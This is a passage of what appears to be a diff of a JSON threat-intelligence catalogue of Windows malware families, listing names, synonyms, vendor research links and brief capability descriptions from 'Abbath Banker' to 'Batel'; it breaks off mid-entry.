"e46262cd-961f-4c7d-8976-0d35a066ab83", - "value": "Abbath Banker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", - "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" - ] - }, - "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", - "value": "AcridRain", - "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", - "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" - ] - }, - "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", - "value": "Acronym", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", - "https://twitter.com/JaromirHorejsi/status/813712587997249536", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" - ] - }, - "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", - "value": "AdamLocker", - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", - "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" - ] - }, - "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", - "value": "win.adkoob", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" - ] - }, - "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", - "value": "AdvisorsBot", - "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", - "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" - ] - }, - "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", - "value": "Adylkuzz", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ComRAT", - "Sun rootkit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", - "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", - "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", - "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/" - ] - }, - "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", - "value": "Agent.BTZ", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", - "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", - "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", - "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", - "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", - "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" - ] - }, - "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", - "value": "Agent Tesla", - "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" - ] - }, - "uuid": "43ec8adc-0658-4765-be20-f22679097fab", - "value": "Aldibot", - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" - ] - }, - "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", - "value": "Project Alice", - "description": "" - }, - { - "meta": { - "synonyms": [ - "alina_spark", - "katrina", - "alina_eagle" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", - "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", - "https://www.nuix.com/blog/alina-continues-spread-its-wings", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" - ] - }, - "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", - "value": "Alina POS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Starman" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", - "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/", - "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf" - ] - }, - "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", - "value": "Allaple", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" - ] - }, - "uuid": "a0881a0c-e677-495b-b475-290af09bb716", - "value": "Alma Communicator", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" - ] - }, - "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", - "value": "AlmaLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", - "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - ] - }, - "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", - "value": "ALPC Local PrivEsc", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", - "https://twitter.com/JaromirHorejsi/status/813714602466877440" - ] - }, - "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", - "value": "Alphabet Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", - "https://blog.cylance.com/an-introduction-to-alphalocker" - ] - }, - "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", - "value": "AlphaLocker", - "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - }, - "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", - "value": "AlphaNC", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - }, - "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", - "value": "Alreay", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Olmarik", - "Pihar", - "TDSS", - "TDL" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" - ] - }, - "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", - "value": "Alureon", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Adupihan" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", - "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", - "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" - ] - }, - "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", - "value": "AMTsol", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Gamarue", - "B106-Gamarue", - "B67-SS-Gamarue", - "b66" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", - "http://blog.morphisec.com/andromeda-tactics-analyzed", - "https://blog.avast.com/andromeda-under-the-microscope", - "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", - "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", - "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", - "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", - "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", - "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" - ] - }, - "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", - "value": "Andromeda", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" - ] - }, - "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", - "value": "Anel", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Latinus" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" - ] - }, - "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", - "value": "Antilam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", - "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" - ] - }, - "uuid": "d3e16d46-e436-4757-b962-6fd393056415", - "value": "Apocalipto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", - "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" - ] - }, - "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", - "value": "Apocalypse", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" - ] - }, - "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", - "value": "ArdaMax", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - }, - "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", - "value": "Arefty", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Aaron Keylogger" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", - "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", - "http://remote-keylogger.net/" - ] - }, - "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", - "value": "Arik Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", - "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", - "https://twitter.com/Racco42/status/1001374490339790849", - "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" - ] - }, - "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", - "value": "ARS VBS Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" - ] - }, - "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", - "value": "AscentLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" - ] - }, - "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", - "value": "ASPC", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Aseljo", - "BadSrc" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", - "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", - "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" - ] - }, - "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", - "value": "Asprox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", - "http://blog.talosintel.com/2017/02/athena-go.html" - ] - }, - "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", - "value": "AthenaGo RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - }, - "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", - "value": "ATI-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", - "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" - ] - }, - "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", - "value": "ATMii", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" - ] - }, - "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", - "value": "ATMitch", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", - "value": "Atmosphere", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", - "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", - "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" - ] - }, - "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", - "value": "ATMSpitter", - "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", - "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", - "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" - ] - }, - "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", - "value": "August Stealer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Riodrv" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", - "value": "Auriga", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" - ] - }, - "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", - "value": "Aurora", - "description": "Ransomware" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", - "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" - ] - }, - "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", - "value": "AvastDisabler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", - "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" - ] - }, - "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", - "value": "AVCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" - ] - }, - "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", - "value": "Aveo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", - "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" - ] - }, - "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", - "value": "Avzhan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" - ] - }, - "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", - "value": "Ayegent", - "description": "" - }, - { - "meta": { - "synonyms": [ - "PuffStealer", - "Rultazo" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", - "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] - }, - "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", - "value": "Azorult", - "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." - }, - { - "meta": { - "synonyms": [ - "SNOWBALL" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", - "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "http://www.spiegel.de/media/media-35683.pdf", - "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" - ] - }, - "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", - "value": "Babar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] - }, - "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", - "value": "BABYMETAL", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - }, - "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", - "value": "backspace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", - "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", - "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", - "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", - "https://www.cert.pl/en/news/single/backswap-malware-analysis/" - ] - }, - "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", - "value": "BackSwap", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", - "https://twitter.com/PhysicalDrive0/status/833067081981710336" - ] - }, - "uuid": "af1c99be-e55a-473e-abed-726191e1da05", - "value": "BadEncript", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", - "value": "badflick", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" - ] - }, - "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", - "value": "BadNews", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" - ] - }, - "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", - "value": "Bagle", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - }, - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", - "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" - ] - }, - "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", - "value": "Banatrix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", - "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" - ] - }, - "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", - "value": "bangat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "MultiBanker 2", - "BankPatch", - "BackPatcher" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", - "http://blog.kleissner.org/?p=69", - "http://osint.bambenekconsulting.com/feeds/", - "http://blog.kleissner.org/?p=192", - "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" - ] - }, - "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", - "value": "Banjori", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", - "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" - ] - }, - "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", - "value": "Bankshot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" - ] - }, - "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", - "value": "Bart", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", - "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" - ] - }, - "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", - "value": "BatchWiper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" - ] - }, - "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", - "value": "Batel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", - 